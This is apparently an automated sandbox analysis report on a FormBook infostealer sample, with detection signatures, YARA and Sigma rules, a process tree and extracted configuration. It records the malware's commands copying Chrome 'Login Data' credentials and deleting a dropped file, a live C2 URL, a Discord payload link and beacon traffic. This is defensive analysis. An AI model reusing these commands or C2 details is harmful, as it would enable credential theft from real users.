
Analysis Report f97e137e_by_Libranalysis

Overview

General Information

Sample Name: f97e137e_by_Libranalysis (renamed file extension from none to exe)
Analysis ID: 403818
MD5: f97e137e249bb393fd88b7dec1ddf9a2
SHA1: 09e3865d681b8670aa9a1ef184c06ca40927d94c
SHA256: 2f2c77d7bcd0fbf80b63b7b2e60b8192130c285bce2f946f021dee83954254e6

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Benign windows process drops PE files
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: System File Execution Location Anomaly
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • f97e137e_by_Libranalysis.exe (PID: 6944 cmdline: 'C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe' MD5: F97E137E249BB393FD88B7DEC1DDF9A2)
    • secinit.exe (PID: 4112 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 1904 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 5544 cmdline: /c del 'C:\Windows\SysWOW64\secinit.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3788 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • vp21b7dsh.exe (PID: 2188 cmdline: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe MD5: 174A363BB5A2D88B224546C15DD10906)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.joomlas123.info/3nop/"], "decoy": ["bakecakesandmore.com", "shenglisuoye.com", "chinapopfactory.com", "ynlrhd.com", "liqourforyou.com", "leonqamil.com", "meccafon.com", "online-marketing-strategie.biz", "rbfxi.com", "frseyb.info", "leyu91.com", "hotsmail.today", "beepot.tech", "dunaemmetmobility.com", "sixpenceworkshop.com", "incrediblefavorcoaching.com", "pofo.info", "yanshudaili.com", "yellowbrickwedding.com", "paintpartyblueprint.com", "capricorn1967.com", "meucarrapicho.com", "41230793.net", "yoghurtberry.com", "wv0uoagz0yr.biz", "yfjbupes.com", "mindfulinthemadness.com", "deloslifesciences.com", "adokristal.com", "vandergardetuinmeubelshop.com", "janewagtus.com", "cloudmorning.com", "foresteryt01.com", "accident-law-yer.info", "divorcerefinance.guru", "wenxiban.com", "589man.com", "rockerdwe.com", "duftkerzen.info", "igametalent.com", "yoursafetraffictoupdates.review", "jialingjiangpubu.com", "maximscrapbooking.com", "20sf.info", "shadowlandswitchery.com", "pmbnc.info", "shoppingdrift.online", "potashdragon.com", "ubkswmpes.com", "064ewj.info", "rewsales.com", "dealsforyou.tech", "ziruixu.com", "naehascloud.com", "smokvape.faith", "sunflowermoonstudio.com", "stepgentertainment.com", "tawbj.info", "besthappybuds.net", "koohshoping.com", "ajikrentcarsurabaya.com", "jkjohnsroofingfl.com", "whatsnexttnd.com", "yoyodvd.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18449:$sqlite3step: 68 34 1C 7B E1
    • 0x1855c:$sqlite3step: 68 34 1C 7B E1
    • 0x18478:$sqlite3text: 68 38 2A 90 C5
    • 0x1859d:$sqlite3text: 68 38 2A 90 C5
    • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      2.2.secinit.exe.10410000.5.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        2.2.secinit.exe.10410000.5.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.secinit.exe.10410000.5.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17649:$sqlite3step: 68 34 1C 7B E1
        • 0x1775c:$sqlite3step: 68 34 1C 7B E1
        • 0x17678:$sqlite3text: 68 38 2A 90 C5
        • 0x1779d:$sqlite3text: 68 38 2A 90 C5
        • 0x1768b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x177b3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.secinit.exe.10410000.5.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          2.2.secinit.exe.10410000.5.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

          Sigma detected: System File Execution Location Anomaly
          Source: Process started | Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\System32\secinit.exe, ParentImage: C:\Windows\SysWOW64\secinit.exe, ParentProcessId: 4112, ProcessCommandLine: , ProcessId: 3424

          Stealing of Sensitive Information:

          Sigma detected: Steal Google chrome login data
          Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\ipconfig.exe, ParentImage: C:\Windows\SysWOW64\ipconfig.exe, ParentProcessId: 1904, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3788

          Signature Overview

          AV Detection:

          Antivirus / Scanner detection for submitted sample
          Source: f97e137e_by_Libranalysis.exe | Avira: detected
          Found malware configuration
          Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.joomlas123.info/3nop/"], "decoy": ["bakecakesandmore.com", "shenglisuoye.com", "chinapopfactory.com", "ynlrhd.com", "liqourforyou.com", "leonqamil.com", "meccafon.com", "online-marketing-strategie.biz", "rbfxi.com", "frseyb.info", "leyu91.com", "hotsmail.today", "beepot.tech", "dunaemmetmobility.com", "sixpenceworkshop.com", "incrediblefavorcoaching.com", "pofo.info", "yanshudaili.com", "yellowbrickwedding.com", "paintpartyblueprint.com", "capricorn1967.com", "meucarrapicho.com", "41230793.net", "yoghurtberry.com", "wv0uoagz0yr.biz", "yfjbupes.com", "mindfulinthemadness.com", "deloslifesciences.com", "adokristal.com", "vandergardetuinmeubelshop.com", "janewagtus.com", "cloudmorning.com", "foresteryt01.com", "accident-law-yer.info", "divorcerefinance.guru", "wenxiban.com", "589man.com", "rockerdwe.com", "duftkerzen.info", "igametalent.com", "yoursafetraffictoupdates.review", "jialingjiangpubu.com", "maximscrapbooking.com", "20sf.info", "shadowlandswitchery.com", "pmbnc.info", "shoppingdrift.online", "potashdragon.com", "ubkswmpes.com", "064ewj.info", "rewsales.com", "dealsforyou.tech", "ziruixu.com", "naehascloud.com", "smokvape.faith", "sunflowermoonstudio.com", "stepgentertainment.com", "tawbj.info", "besthappybuds.net", "koohshoping.com", "ajikrentcarsurabaya.com", "jkjohnsroofingfl.com", "whatsnexttnd.com", "yoyodvd.com"]}
          Multi AV Scanner detection for domain / URL
          Source: www.joomlas123.info | Virustotal: Detection: 10%
          Source: www.joomlas123.info/3nop/ | Virustotal: Detection: 13%
          Multi AV Scanner detection for submitted file
          Source: f97e137e_by_Libranalysis.exe | Virustotal: Detection: 26%
          Source: f97e137e_by_Libranalysis.exe | ReversingLabs: Detection: 29%
          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: 2.2.secinit.exe.10410000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: f97e137e_by_Libranalysis.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: Binary string: ipconfig.pdb source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: secinit.pdbGCTL source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, vp21b7dsh.exe.3.dr
          Source: Binary string: wntdll.pdbUGP source: secinit.exe, 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp, ipconfig.exe, 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: secinit.exe, ipconfig.exe
          Source: Binary string: secinit.pdb source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, vp21b7dsh.exe.3.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\secinit.exe | Code function: 4x nop then pop ebx 2_2_10417AD0
          Source: C:\Windows\SysWOW64\secinit.exe | Code function: 4x nop then pop edi 2_2_1041E58F
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop ebx 10_2_00157AD0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi 10_2_00166D61
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi 10_2_0015E58F

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor | URLs: www.joomlas123.info/3nop/
          Source: global traffic | HTTP traffic detected: GET /3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50 HTTP/1.1 | Host: www.joomlas123.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 199.192.24.139
          Source: Joe Sandbox View | IP Address: 162.159.134.233
          Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
          Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global traffic | HTTP traffic detected: GET /3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50 HTTP/1.1 | Host: www.joomlas123.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 May 2021 10:34:10 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 6f 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nop/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
          Source: explorer.exe, 00000003.00000002.922678107.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com/CPS0v
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653912925.0000000000789000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/831802482459672609/839049205866561576/Vylsmojatnhhurydzinydcl
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
          Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49739 version: TLS 1.2

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\50M6QC82\50Mlogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\50M6QC82\50Mlogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
